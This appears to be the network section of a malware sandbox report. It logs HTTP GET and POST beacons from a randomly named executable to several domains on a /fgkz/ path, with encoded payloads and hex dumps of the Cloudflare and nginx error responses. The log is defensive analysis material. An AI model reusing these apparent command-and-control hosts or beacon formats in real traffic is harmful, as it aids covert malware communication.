VpjgYNS/3QKp89WU0rr1tF833LKBhzQr9iMsw9xOVc3NAMhHdgSqA9uwLClZHY7y/k7CDFHc9GTVlO36q2u71o7gHhesSGn9KzyDMn5JK/SHi55CdUfFrVy5NkRoF1L4QIXQ0cM0yfDsA9WsKfiHYePR8H6Qe//kwrycrhoN88NTzvbmF1oKy+npenyjBSQQawPYIEGzAIRQ [TRUNCATED]
                                Aug 30, 2024 07:20:35.167500019 CEST1236INHTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:35 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9oKK3Fx0eK3F%2B5XuPMwyyK5L1R3DXCj2RSMMfW9S1sP1WwmrBi3K3cgWjwUKICYwnoqIVLHPWH606WiK8K3fagLlk3V6IViUuruPn2O8l4YYa50scFBGPAf9c6XID%2Fjz9LS"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb25519a8b61a1b-EWR
                                Content-Encoding: gzip
                                Data Raw: 38 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 1a 59 8e 5d 69 34 41 d7 f1 a2 de 4d 13 a3 76 d0 06 45 61 70 86 77 24 c6 14 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 a3 57 6f 3f 5c dc 7e ba be 84 b9 5b c8 b8 15 bd a2 f4 37 91 81 74 70 75 09 67 bf c7 10 f9 01 48 25 b3 76 4a 94 a6 9f 2d 08 7c 0d 5a 72 81 04 24 53 b3 29 41 45 3f de 90 18 a2 57 bf a1 e2 22 fb 9d d2 27 51 95 1c 80 e3 a2 ce be 4d d4 f9 0b a2 ce bf 41 d4 cc 55 d2 7c c7 31 2b 0f a5 50 ba 2b 69 8e 8c c7 ad c8 09 27 31 7e fb fe 06 72 2d 94 b3 e0 34 e4 46 cf 45 22 1c 72 b8 ba 86 3f 61 bd 5e f7 b5 d3 0b 26 54 5f a8 4c c3 9f 70 21 f5 92 67 92 19 8c 82 52 44 2b 5a a0 63 90 ce 99 b1 e8 a6 e4 e3 ed bf e8 39 81 a0 1e 98 3b 97 53 fc 63 29 56 53 72 a1 95 43 e5 e8 ed 26 47 02 69 d9 9a 12 87 0f 2e f0 a6 4c b6 62 5e 92 f2 2b fd f8 03 bd d0 8b 9c 39 91 c8 a6 a0 ab cb e9 25 9f 61 63 9d 62 0b 9c 12 a3 13 ed 6c 63 a2 d2 42 71 7c e8 81 d2 99 96 52 af 0f 96 ac 04 ae 73 6d 5c [TRUNCATED]
                                Data Ascii: 88dXko7_qT5Y]i4AMvEapw$9%)B<n`_qxyxWo?\~[7tpugH%vJ-|Zr$S)AE?W"'QMAU|1+P+i'1~r-4FE"r?a^&T_Lp!gRD+Zc9;Sc)VSrC&Gi.Lb^+9%acblcBq|Rsm\cZp7r\i%`I)=SbF#:OI]4`6%AMg"(xZF.
                                Aug 30, 2024 07:20:35.167515993 CEST224INData Raw: 6e 75 b2 a5 4a 9d d0 aa d3 fd 22 b2 0e d7 e9 72 81 ca f5 19 e7 97 2b 54 ee 9d b0 0e 15 9a 76 7b 2d 14 d7 eb fe af 3f bd fb d1 b9 fc 67 fc 63 89 d6 b5 db ff be f9 f0 be fc df b7 ce 08 35 13 d9 a6 fb 65 c5 0c e0 74 2b 9b 95 3d e9 74 2b 7f 86 ee 52
                                Data Ascii: nuJ"r+Tv{-?gc5et+=t+Rwy{jfoXh-5*:a/zRI/7:GB8Ao2rz+4Vh5'I_:-#;3cnO"`VaPlOoUjb
                                Aug 30, 2024 07:20:35.167527914 CEST1236INData Raw: 47 58 9e 4b 91 32 ef bb e0 b3 d5 ea 99 55 37 e5 7e f4 46 2f 4d 8a f4 3f b8 21 3d 92 9e 9d 85 d9 00 47 c9 e9 e8 fb d1 28 c1 24 1b 0d 5f 87 7c 34 4a f8 d9 f7 2c 44 d2 9d b4 bc 30 c5 3b bb 51 eb b0 6e 77 92 f6 8b 83 ef c3 ee 31 d0 d9 7a 8b ce 05 e7
                                Data Ascii: GXK2U7~F/M?!=G($_|4J,D0;Qnw1z5)zGf=NRSe;@(kN@*Y:}R&Knwxy5>v{kgnt'(Or}cI[`h2mL73YU%(z&nD\C9
                                Aug 30, 2024 07:20:35.167534113 CEST343INData Raw: e2 42 24 5a 72 12 ef b3 a7 a7 34 d5 20 2d cf e8 60 31 67 86 39 5d 18 5f 05 31 3e 64 5f e5 ea 8a 6b 37 d4 a7 22 27 cf 18 56 25 81 43 fb aa 68 7e f2 61 bf ba 1e b7 76 0f c1 0e 2e f7 77 cc a9 c1 15 32 79 6c cf 7a 8c 26 4e 79 27 8a f4 be cc 7d be 73
                                Data Ascii: B$Zr4 -`1g9]_1>d_k7"'V%Ch~av.w2ylz&Ny'}sxcHl?pG]?:C<J6[.pH6p+$}!(m\PbwPWi?S5xUH~<_xq/In>vyVH&/W


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.549742104.21.92.135805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:36.952610016 CEST346OUTGET /fgkz/?nFeHa=dbNpTj&4f2t8=jkJyt4aMtNKoYD5sbuFVc9QyaTZ4K2J/yr+l21//H5N/WdfnKajTYLfT/HfxXPoaC4ByuXnDUz3XZuyNEmOuuyoe00P8CgSW4g== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.otomain.info
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:20:37.686898947 CEST1236INHTTP/1.1 403 Forbidden
                                Date: Fri, 30 Aug 2024 05:20:37 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Referrer-Policy: same-origin
                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4VTd3e2kN%2BX4JlJqO1c9KRzoroOiyYw%2BJlzDiSSgMDeX5Jdwns%2FI%2BKn4pvDkmdTolQexX2IBEj%2BGvGC6btTaSdOirvtVWw6FswpIkZWgdr2a0r7ILG5OioTyW%2BX5W7CX8e7k"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 8bb255297edb43fb-EWR
                                Data Raw: 31 37 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 [TRUNCATED]
                                Data Ascii: 17ba<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS points to prohibited IP | www.otomain.info | Cloudflare</title><meta charset="UTF-8" /><m
                                Aug 30, 2024 07:20:37.686916113 CEST224INData Raw: 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75
                                Data Ascii: eta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width
                                Aug 30, 2024 07:20:37.686959982 CEST1236INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c
                                Data Ascii: ,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById
                                Aug 30, 2024 07:20:37.686970949 CEST1236INData Raw: 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 20 68 69 64 64 65 6e 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61
                                Data Ascii: ror cf-cookie-error hidden" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="p-0"> <header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased">
                                Aug 30, 2024 07:20:37.686981916 CEST1236INData Raw: 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 20 6e 65 74 77 6f 72 6b
                                Data Ascii: ps://www.cloudflare.com/5xx-error-landing/" target="_blank">Cloudflare</a> network. Unfortunately, it is resolving to an IP address that is creating a conflict within Cloudflare's system.</p> </div>
                                Aug 30, 2024 07:20:37.686992884 CEST1236INData Raw: 6e 6f 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 4e 6f 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 65 65 64 62 61 63 6b 2d 73 75 63 63 65 73 73 20 66 65 65 64 62 61 63 6b
                                Data Ascii: no" type="button">No</button> </div> <div class="feedback-success feedback-hidden" id="error-feedback-success"> Thank you for your feedback! </div></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10
                                Aug 30, 2024 07:20:37.687002897 CEST495INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29
                                Data Ascii: ementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventL


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.549743122.10.12.59805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:43.185888052 CEST612OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 58 63 32 70 48 55 6f 45 6b 6d 2b 4f 61 46 41 44 6a 58 6c 2b 44 2f 56 63 4d 7a 72 4e 75 44 69 65 39 51 79 31 4e 54 45 2f 30 57 78 6e 53 66 64 56 33 6b 4d 70 62 47 48 46 33 79 53 63 6d 53 6c 69 59 33 6a 48 66 79 48 30 6e 75 75 56 2f 77 4c 41 67 46 6f 44 52 6d 44 51 68 65 62 46 6f 2f 4d 70 31 63 5a 6b 57 4b 2f 75 71 30 72 5a 56 56 78 6c 38 6f 6b 76 58 6b 4c 38 5a 4e 66 6f 42 64 39 34 54 4b 54 6e 69 35 64 35 61 54 48 38 38 41 4b 30 54 70 74 71 37 43 34 55 54 58 4d 32 35 5a 73 78 44 58 57 75 5a 4b 53 59 77 62 51 41 50 77 58 6c 46 41 3d 3d
                                Data Ascii: 4f2t8=Xc2pHUoEkm+OaFADjXl+D/VcMzrNuDie9Qy1NTE/0WxnSfdV3kMpbGHF3yScmSliY3jHfyH0nuuV/wLAgFoDRmDQhebFo/Mp1cZkWK/uq0rZVVxl8okvXkL8ZNfoBd94TKTni5d5aTH88AK0Tptq7C4UTXM25ZsxDXWuZKSYwbQAPwXlFA==
                                Aug 30, 2024 07:20:44.879622936 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Aug 30, 2024 07:20:44.880357981 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Aug 30, 2024 07:20:44.880553961 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.549744122.10.12.59805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:45.718992949 CEST632OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 58 63 32 70 48 55 6f 45 6b 6d 2b 4f 62 6d 59 44 6d 30 64 2b 53 50 56 66 48 54 72 4e 6c 6a 6a 56 39 51 75 31 4e 53 42 67 30 45 46 6e 53 2f 74 56 6d 56 4d 70 63 47 48 46 38 53 53 64 6f 79 6c 72 59 33 75 36 66 32 48 30 6e 75 36 56 2f 30 48 41 6a 79 45 41 53 57 44 53 74 2b 62 48 6d 66 4d 70 31 63 5a 6b 57 4b 71 44 71 31 50 5a 55 6d 70 6c 39 4a 6b 73 4c 55 4c 39 61 4e 66 6f 4b 39 38 78 54 4b 54 52 69 39 39 66 61 56 62 38 38 42 61 30 55 38 52 70 78 43 34 65 4f 6e 4d 6f 71 59 5a 47 45 32 65 38 52 49 37 6c 75 34 52 31 44 46 37 32 43 78 76 74 73 33 38 55 66 74 66 63 57 59 6a 44 6a 31 67 33 33 5a 73 3d
                                Data Ascii: 4f2t8=Xc2pHUoEkm+ObmYDm0d+SPVfHTrNljjV9Qu1NSBg0EFnS/tVmVMpcGHF8SSdoylrY3u6f2H0nu6V/0HAjyEASWDSt+bHmfMp1cZkWKqDq1PZUmpl9JksLUL9aNfoK98xTKTRi99faVb88Ba0U8RpxC4eOnMoqYZGE2e8RI7lu4R1DF72Cxvts38UftfcWYjDj1g33Zs=
                                Aug 30, 2024 07:20:46.596734047 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:46 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.549745122.10.12.59805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:20:48.247308016 CEST1645OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 58 63 32 70 48 55 6f 45 6b 6d 2b 4f 62 6d 59 44 6d 30 64 2b 53 50 56 66 48 54 72 4e 6c 6a 6a 56 39 51 75 31 4e 53 42 67 30 45 64 6e 53 4f 4e 56 30 47 55 70 64 47 48 46 78 79 53 51 6f 79 6b 35 59 30 66 39 66 33 37 43 6e 72 2b 56 2b 58 50 41 33 58 77 41 4a 6d 44 53 77 4f 62 47 6f 2f 4e 72 31 63 6f 73 57 4b 36 44 71 31 50 5a 55 6a 6c 6c 72 6f 6b 73 59 45 4c 38 5a 4e 66 73 42 64 38 5a 54 4b 61 6b 69 39 35 70 61 47 44 38 79 41 71 30 53 4f 35 70 73 79 34 59 50 6e 4e 37 71 59 46 5a 45 32 43 77 52 49 2f 66 75 2f 31 31 50 44 57 55 66 43 50 55 2b 68 46 32 4e 73 33 66 4f 76 62 4b 77 6c 64 74 74 75 53 4c 5a 48 49 72 42 63 68 65 72 34 31 41 35 6e 31 71 31 34 76 4f 73 47 49 63 2b 4f 4f 61 42 49 4b 37 6c 52 6d 67 42 56 64 56 65 30 57 48 4e 37 4e 48 70 78 57 42 5a 6d 2f 41 7a 37 70 43 74 61 6c 72 50 2b 41 53 74 76 51 55 38 52 4d 49 65 4c 45 46 32 75 71 56 66 6f 45 32 43 52 6d 45 6c 65 50 42 56 6a 33 31 69 46 43 67 4e 31 63 47 73 6a 6b 6c 6c 78 59 4c 58 78 31 65 74 47 43 48 77 57 4a 48 51 4a 73 59 [TRUNCATED]
